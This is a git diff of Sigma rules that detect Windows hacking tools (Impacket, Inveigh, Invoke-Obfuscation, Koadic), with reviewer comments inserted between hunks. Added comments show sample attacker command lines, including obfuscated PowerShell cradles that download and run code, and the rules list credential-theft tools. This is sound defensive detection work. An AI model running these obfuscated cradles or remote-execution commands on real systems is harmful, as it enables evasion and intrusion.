e31f89f7-36fb-4697-8ab6-48823708353b - type: obsoletes + - id: e31f89f7-36fb-4697-8ab6-48823708353b + type: obsoletes status: stable description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework references: 
@@ -27,22 +27,40 @@ detection: EventID: 4688 Channel: Security selection_other: - CommandLine|contains|all: + # *** wmiexec.py + # parent is wmiprvse.exe + # examples: + # cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 + # cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 + # *** dcomexec.py -object MMC20 + # parent is mmc.exe + # example: + # "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567442499.05 2>&1 + # *** dcomexec.py -object ShellBrowserWindow + # runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe + # example: + # "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1567520103.71 2>&1 + # *** smbexec.py + # parent is services.exe + # example: + # C:\Windows\system32\cmd.exe /Q /c echo tasklist ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat + CommandLine|contains|all: - cmd.exe - /Q - /c - \\\\127.0.0.1\\ - '&1' ParentProcessName|endswith: - - \wmiprvse.exe - - \mmc.exe - - \explorer.exe - - \services.exe + - \wmiprvse.exe # wmiexec + - \mmc.exe # dcomexec MMC + - \explorer.exe # dcomexec ShellBrowserWindow + - \services.exe # smbexec selection_atexec: ParentCommandLine|contains: - - svchost.exe -k netsvcs - - taskeng.exe - CommandLine|contains|all: + - svchost.exe -k netsvcs # atexec on win10 (parent is "C:\Windows\system32\svchost.exe -k netsvcs") + - taskeng.exe # atexec on win7 (parent is "taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\System:Service:") + # cmd.exe /C tasklist /m > C:\Windows\Temp\bAJrYQtL.tmp 2>&1 + CommandLine|contains|all: - cmd.exe - /C - Windows\Temp\ 
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml index 817c32347..81e69e131 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml @@ -1,8 +1,7 @@ title: HackTool - Impacket Tools Execution id: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19 status: test -description: Detects the execution of different compiled Windows binaries of the impacket - toolset (based on names or part of their names - could lead to false positives) +description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) references: - https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries author: Florian Roth (Nextron Systems) 
@@ -19,43 +18,58 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|contains: - - \goldenPac - - \karmaSMB - - \kintercept - - \ntlmrelayx - - \rpcdump - - \samrdump - - \secretsdump - - \smbexec - - \smbrelayx - - \wmiexec - - \wmipersist - - NewProcessName|endswith: - - \atexec_windows.exe - - \dcomexec_windows.exe - - \dpapi_windows.exe - - \findDelegation_windows.exe - - \GetADUsers_windows.exe - - \GetNPUsers_windows.exe - - \getPac_windows.exe - - \getST_windows.exe - - \getTGT_windows.exe - - \GetUserSPNs_windows.exe - - \ifmap_windows.exe - - \mimikatz_windows.exe - - \netview_windows.exe - - \nmapAnswerMachine_windows.exe - - \opdump_windows.exe - - \psexec_windows.exe - - \rdp_check_windows.exe - - \sambaPipe_windows.exe - - \smbclient_windows.exe - - \smbserver_windows.exe - - \sniff_windows.exe - - \sniffer_windows.exe - - \split_windows.exe - - \ticketer_windows.exe + - NewProcessName|contains: + - \goldenPac + - \karmaSMB + - \kintercept + - \ntlmrelayx + - \rpcdump + - \samrdump + - \secretsdump + - \smbexec + - \smbrelayx + - \wmiexec + - \wmipersist + - NewProcessName|endswith: + - \atexec_windows.exe + - \dcomexec_windows.exe + - \dpapi_windows.exe + - \findDelegation_windows.exe + - \GetADUsers_windows.exe + - \GetNPUsers_windows.exe + - \getPac_windows.exe + - \getST_windows.exe + - \getTGT_windows.exe + - \GetUserSPNs_windows.exe + - \ifmap_windows.exe + - \mimikatz_windows.exe + - \netview_windows.exe + - \nmapAnswerMachine_windows.exe + - \opdump_windows.exe + - \psexec_windows.exe + - \rdp_check_windows.exe + - \sambaPipe_windows.exe + - \smbclient_windows.exe + - \smbserver_windows.exe + - \sniff_windows.exe + - \sniffer_windows.exe + - \split_windows.exe + - \ticketer_windows.exe + # - '\addcomputer_windows.exe' + # - '\esentutl_windows.exe' + # - '\getArch_windows.exe' + # - '\lookupsid_windows.exe' + # - '\mqtt_check_windows.exe' + # - '\mssqlclient_windows.exe' + # - '\mssqlinstance_windows.exe' + # - 
'\ntfs-read_windows.exe' + # - '\ping_windows.exe' + # - '\ping6_windows.exe' + # - '\raiseChild_windows.exe' + # - '\reg_windows.exe' + # - '\registry-read_windows.exe' + # - '\services_windows.exe' + # - '\wmiquery_windows.exe' condition: process_creation and selection falsepositives: - Legitimate use of the impacket tools diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_impersonate.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_impersonate.yml index 39bf35892..9d65240a6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_impersonate.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_impersonate.yml @@ -1,8 +1,7 @@ title: HackTool - Impersonate Execution id: cf0c254b-22f1-4b2b-8221-e137b3c0af94 status: test -description: Detects execution of the Impersonate tool. Which can be used to manipulate - tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively references: - https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/ - https://github.com/sensepost/impersonate @@ -22,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection_commandline_exe: - CommandLine|contains: impersonate.exe + CommandLine|contains: impersonate.exe selection_commandline_opt: - CommandLine|contains: + CommandLine|contains: - ' list ' - ' exec ' - ' adduser ' 
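Review bot: The block of commented-out `NewProcessName|endswith` entries appended to the selection (from `\addcomputer_windows.exe` through `\wmiquery_windows.exe`) carries no explanation of why those names are excluded, so a maintainer cannot tell whether they are disabled on purpose or simply pending review. Names such as `\ping_windows.exe`, `\reg_windows.exe` and `\services_windows.exe` look generic enough to collide with legitimate binaries, which is presumably the reason for leaving them out. A single comment before the block, e.g. `# Intentionally excluded: names too generic, would match legitimate binaries`, would record that decision next to the list it applies to.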
@@ -34,9 +33,9 @@ detection: - SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A - IMPHASH=0A358FFC1697B7A07D0E817AC740DF62 selection_hash_ext: - - md5: 9520714AB576B0ED01D1513691377D01 - - sha256: E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A - - Imphash: 0A358FFC1697B7A07D0E817AC740DF62 + - md5: 9520714AB576B0ED01D1513691377D01 + - sha256: E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A + - Imphash: 0A358FFC1697B7A07D0E817AC740DF62 condition: process_creation and (all of selection_commandline_* or 1 of selection_hash_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_inveigh.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_inveigh.yml index c6b727c6d..0240720f6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_inveigh.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_inveigh.yml @@ -1,8 +1,7 @@ title: HackTool - Inveigh Execution id: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0 status: test -description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle - tool +description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool references: - https://github.com/Kevin-Robertson/Inveigh - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ 
@@ -20,17 +19,17 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \Inveigh.exe - - OriginalFileName: - - \Inveigh.exe - - \Inveigh.dll - - Description: Inveigh - - CommandLine|contains: - - ' -SpooferIP' - - ' -ReplyToIPs ' - - ' -ReplyToDomains ' - - ' -ReplyToMACs ' - - ' -SnifferIP' + - NewProcessName|endswith: \Inveigh.exe + - OriginalFileName: + - \Inveigh.exe + - \Inveigh.dll + - Description: Inveigh + - CommandLine|contains: + - ' -SpooferIP' + - ' -ReplyToIPs ' + - ' -ReplyToDomains ' + - ' -ReplyToMACs ' + - ' -SnifferIP' condition: process_creation and selection falsepositives: - Very unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml index ea239500b..b3d7423d3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml @@ -3,7 +3,7 @@ id: b222df08-0e07-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of Clip.exe to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2022/11/17 
@@ -20,12 +20,15 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + # Example 1: Cmd /c" echo/Invoke-Expression (New-Object Net.WebClient).DownloadString |cLiP&& POWerSheLl -Nolog -sT . (\"{1}{2}{0}\"-f'pe','Ad',(\"{1}{0}\" -f'Ty','d-' ) ) -Assemb ( \"{5}{1}{3}{0}{2}{4}\" -f'ows','y','.F',(\"{0}{1}{2}\" -f'stem.W','i','nd'),( \"{0}{1}\"-f 'o','rms' ),'S' ) ; ([SySTEM.wiNDows.FoRmS.CLiPbOArd]::( \"{1}{0}\" -f (\"{1}{0}\" -f'T','TTeX' ),'gE' ).\"invO`Ke\"( ) ) ^| ^&( \"{5}{1}{2}{4}{3}{0}\" -f 'n',( \"{1}{0}\"-f'KE-','o' ),(\"{2}{1}{0}\"-f 'pRESS','x','e' ),'o','i','iNV') ; [System.Windows.Forms.Clipboard]::(\"{0}{1}\" -f( \"{1}{0}\"-f'e','SetT' ),'xt').\"InV`oKe\"( ' ')" + # Example 2: CMD/c " ECho Invoke-Expression (New-Object Net.WebClient).DownloadString|c:\WiNDowS\SySteM32\cLip && powershElL -noPRO -sTa ^& (\"{2}{0}{1}\" -f 'dd',(\"{1}{0}\"-f 'ype','-T' ),'A' ) -AssemblyN (\"{0}{3}{2}{1}{4}\"-f'Pr','nCo',(\"{0}{1}\"-f'e','ntatio'),'es','re' ) ; ^& ( ( [StRinG]${ve`RB`OSE`pr`e`FeReNCE} )[1,3] + 'x'-JoiN'') ( ( [sySTem.WInDOWs.ClipbOaRD]::( \"{1}{0}\" -f(\"{0}{1}\" -f'tTe','xt' ),'ge' ).\"IN`Vo`Ke\"( ) ) ) ; [System.Windows.Clipboard]::( \"{2}{1}{0}\" -f't',( \"{0}{1}\" -f 'tT','ex' ),'Se' ).\"In`V`oKe\"( ' ' )" + CommandLine|contains|all: - cmd - '&&' - 'clipboard]::' - -f - CommandLine|contains: + CommandLine|contains: - /c - /r condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml index 7752cae3b..f04c47fbb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml 
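Review bot: The original `CommandLine|re` pattern is retained only as a commented-out line above `CommandLine|contains|all`, with no note on why it was replaced by the broader contains-based selection; the same applies to the hunks in proc_creation_win_hktl_invoke_obfuscation_stdin.yml, proc_creation_win_hktl_invoke_obfuscation_var.yml and proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml. A one-line comment such as `# Original regex kept for reference only; the contains-based selection below is the active logic` would make clear that the regex is documentation rather than a disabled condition. The two example command lines in the comment run to several hundred characters each; trimming them to the fragments the selection actually keys on (`cmd`, `/c`, `clip`, `clipboard]::`, `-f`) would keep the rule readable without losing the illustration.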
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml @@ -1,8 +1,7 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation id: 4bf943c6-5146-4273-98dd-e958fd1e3abf status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the following code block +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -21,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - CommandLine|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - CommandLine|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - CommandLine|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - CommandLine|re: \*mdr\*\W\s*\)\.Name - - CommandLine|re: \$VerbosePreference\.ToString\( - - CommandLine|re: \[String\]\s*\$VerbosePreference + - CommandLine|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - CommandLine|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - CommandLine|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - CommandLine|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - CommandLine|re: \*mdr\*\W\s*\)\.Name + - CommandLine|re: \$VerbosePreference\.ToString\( + - CommandLine|re: \[String\]\s*\$VerbosePreference condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml index a2364f8c3..d65678ce1 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml @@ -3,7 +3,7 @@ id: 6c96fc76-0eb1-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of stdin to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/17 @@ -20,17 +20,20 @@ detection: EventID: 4688 Channel: Security selection_main: - CommandLine|contains|all: + # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + # Example 1: c:\windows\sYstEm32\CmD.eXE /C"echO\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -" + # Example 2: c:\WiNDOws\sysTEm32\cmd.EXe /C " ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )" + CommandLine|contains|all: - cmd - powershell - CommandLine|contains: + CommandLine|contains: - /c - /r selection_other: - - CommandLine|contains: noexit - - CommandLine|contains|all: - - input - - $ + - CommandLine|contains: noexit + - CommandLine|contains|all: + - input + - $ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml index be85f0598..c4a06ef10 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml 
@@ -3,7 +3,7 @@ id: 27aec9c9-dbb0-4939-8422-1742242471d0 status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/17 @@ -20,11 +20,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + # Example 1: C:\winDoWs\SySTeM32\cmd.Exe /C"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\"{2}{3}{0}{1}\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\"IN`VO`KecOmMaND\".\"inVo`KES`crIPt\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\"{1}{4}{2}{3}{0}\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \"{0}{1}\"-f'n','oti' ),( \"{0}{1}\" -f'pRoC','esS') )) )" + # Example 2: cMD.exe /C "seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\"{1}{0}{2}{3}\" -f 'eT-vaR','G','iab','lE' ) (\"{0}{1}\" -f '*m','DR*' ) ).\"na`ME\"[3,11,2]-JOIN'' ) ( ( ^&(\"{0}{1}\" -f'g','CI' ) (\"{0}{1}\" -f 'ENV',':SlDb' ) ).\"VA`luE\" ) " + CommandLine|contains|all: - cmd - '"set' - -f - CommandLine|contains: + CommandLine|contains: - /c - /r condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml index 061acae85..0b7eb6e71 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml 
@@ -3,7 +3,7 @@ id: 7eedcc9d-9fdb-4d94-9c54-474e8affc0c7 status: test description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/12/29 @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - new-object - text.encoding]::ascii - CommandLine|contains: + CommandLine|contains: - system.io.compression.deflatestream - system.io.streamreader - readtoend( diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml index 2e27034ef..9b3e877b5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml @@ -3,7 +3,7 @@ id: 9c14c9fa-1a63-4a64-8e57-d19280559490 status: test description: Detects Obfuscated Powershell via Stdin in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28) author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2022/11/16 @@ -20,10 +20,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + CommandLine|contains|all: - set - '&&' - CommandLine|contains: + CommandLine|contains: - environment - invoke - input diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml index 4f538c7ca..2b7fe3e33 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml @@ -3,7 +3,7 @@ id: e1561947-b4e3-4a74-9bdd-83baed21bdb5 status: test description: Detects Obfuscated Powershell via use Clip.exe in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/16 
@@ -20,11 +20,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + # Example 1: C:\WINdoWS\sySteM32\CMd /c " ECho\Invoke-Expression (New-Object Net.WebClient).DownloadString|Clip.Exe&&C:\WINdoWS\sySteM32\CMd /c pOWerSheLl -STa . ( \"{2}{0}{1}\"-f'dd-',(\"{0}{1}\" -f 'T','ype' ),'A' ) -Assembly ( \"{4}{1}{3}{0}{2}\"-f (\"{0}{1}\" -f 'nd','ow'),( \"{1}{0}\"-f'.W','stem' ),( \"{2}{1}{0}\" -f 'rms','Fo','s.'),'i','Sy') ; ${exeCUtIOnCONTeXT}.\"INV`oKECOM`m`ANd\".\"INV`ok`ESCriPT\"( ( [sYSteM.wiNDoWS.forMs.ClIPboaRD]::( \"{2}{0}{1}\" -f'Ex','t',(\"{0}{1}\" -f'Get','t' ) ).\"iNvo`Ke\"( )) ) ; [System.Windows.Forms.Clipboard]::(\"{1}{0}\" -f 'ar','Cle' ).\"in`V`oKE\"( )" + # Example 2: C:\WINDowS\sYsTEM32\CmD.eXE /C" echo\Invoke-Expression (New-Object Net.WebClient).DownloadString| C:\WIndOWs\SYSteM32\CLip &&C:\WINDowS\sYsTEM32\CmD.eXE /C POWERSHeLL -sT -noL [Void][System.Reflection.Assembly]::( \"{0}{3}{4}{1}{2}\" -f( \"{0}{1}\"-f'Lo','adW' ),( \"{0}{1}\"-f 'Par','t'),( \"{0}{1}{2}\"-f 'ial','N','ame'),'it','h' ).\"in`VO`KE\"( ( \"{3}{1}{4}{5}{2}{0}\"-f'rms','ystem.Windo','Fo','S','w','s.' )) ; ( [wIndows.fOrms.cLIPBOArD]::( \"{1}{0}\"-f'T',( \"{1}{0}\" -f'tEX','gET' )).\"i`Nvoke\"( ) ) ^^^| ^^^& ( ( ^^^& ( \"{2}{1}{0}\"-f 'e',( \"{2}{1}{0}\"-f'IABl','aR','v' ),( \"{0}{1}\"-f'Get','-' ) ) ( \"{1}{0}\"-f'*','*MDr' )).\"n`Ame\"[3,11,2]-jOin'') ; [Windows.Forms.Clipboard]::( \"{0}{1}\" -f (\"{1}{0}\"-f'tT','Se' ),'ext').\"in`VoKe\"(' ' )" + CommandLine|contains|all: - echo - clip - '&&' - CommandLine|contains: + CommandLine|contains: - clipboard - invoke - i` diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml index 83d4d23b4..79473f46b 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml @@ -3,7 +3,7 @@ id: ac20ae82-8758-4f38-958e-b44a3140ca88 status: test description: Detects Obfuscated Powershell via use MSHTA in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31) author: Nikita Nazarov, oscd.community date: 2020/10/08 modified: 2022/03/08 @@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - set - '&&' - mshta diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml index 0ea348d84..5cfd4e5ff 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml @@ -3,7 +3,7 @@ id: e9f55347-2928-4c06-88e5-1a7f8169942e status: test description: Detects Obfuscated Powershell via VAR++ LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27) author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2022/11/16 
@@ -20,12 +20,15 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + # Example 1: CMD /C"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\wINDowS\sYsWow64\winDOWspoWERSheLl\V1.0\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\"invo`kEcoMm`A`ND\".( \"{2}{1}{0}\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \"{0}{1}\" -f'D','IR' ) ( \"{0}{1}\"-f'ENV:kU','R')).\"vAl`Ue\" )&& CMD /C%mXI%" + # Example 2: c:\WiNDOWS\sYSTEm32\CmD.exE /C "sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\"{2}{0}{1}\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \"{2}{3}{0}{1}\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \"{2}{5}{0}{1}{6}{4}{3}\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \"{0}{1}\"-f'd','ejLz' ),( \"{1}{2}{0}\"-f'cEss','P','RO') )) )&& c:\WiNDOWS\sYSTEm32\CmD.exE /C %ybkm%" + CommandLine|contains|all: - '&&set' - cmd - /c - -f - CommandLine|contains: + CommandLine|contains: - '{0}' - '{1}' - '{2}' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml index 56505a581..41cf14604 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml 
@@ -22,21 +22,21 @@ detection: ParentCommandLine|endswith: .bat ParentProcessName|endswith: \cmd.exe selection1: - CommandLine|contains|all: + CommandLine|contains|all: - powershell.exe - .bat.exe - NewProcessName|endswith: \xcopy.exe + NewProcessName|endswith: \xcopy.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - pwsh.exe - .bat.exe - NewProcessName|endswith: \xcopy.exe + NewProcessName|endswith: \xcopy.exe selection3: - CommandLine|contains|all: + CommandLine|contains|all: - +s - +h - .bat.exe - NewProcessName|endswith: \attrib.exe + NewProcessName|endswith: \attrib.exe condition: process_creation and (parent_selection and (1 of selection*)) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_koadic.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_koadic.yml index 2ee1a0bfa..0287ae367 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_koadic.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_koadic.yml @@ -22,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /q - /c - chcp diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml index b03787c50..c3babf6e7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml 
